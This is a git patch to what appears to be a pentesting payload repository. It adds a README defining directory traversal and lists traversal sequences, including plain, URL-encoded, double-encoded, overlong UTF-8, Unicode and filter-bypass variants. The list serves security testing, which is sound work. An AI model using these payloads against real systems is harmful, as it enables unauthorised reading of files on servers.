From 4dcb7cc6eab0db67e0bf3d60fa439bf11ff889b6 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Wed, 19 Oct 2016 07:51:24 +0700 Subject: [PATCH] Traversal Directory payloads --- Traversal_Directory/README.md | 20 ++++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/Traversal_Directory/README.md b/Traversal_Directory/README.md index c707ab4f..fa53d197 100644 --- a/Traversal_Directory/README.md +++ b/Traversal_Directory/README.md @@ -1,12 +1,20 @@ -# Title -Lorem +# Traversal Directory +A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. -## Vuln +## Exploit ``` -Code +../ +..\ +..\/ +%2e%2e%2f +%252e%252e%252f +%c0%ae%c0%ae%c0%af +%uff0e%uff0e%u2215 +%uff0e%uff0e%u2216 +..././ +...\.\ ``` ## Thanks to -* Lorem -* Ipsum \ No newline at end of file +* \ No newline at end of file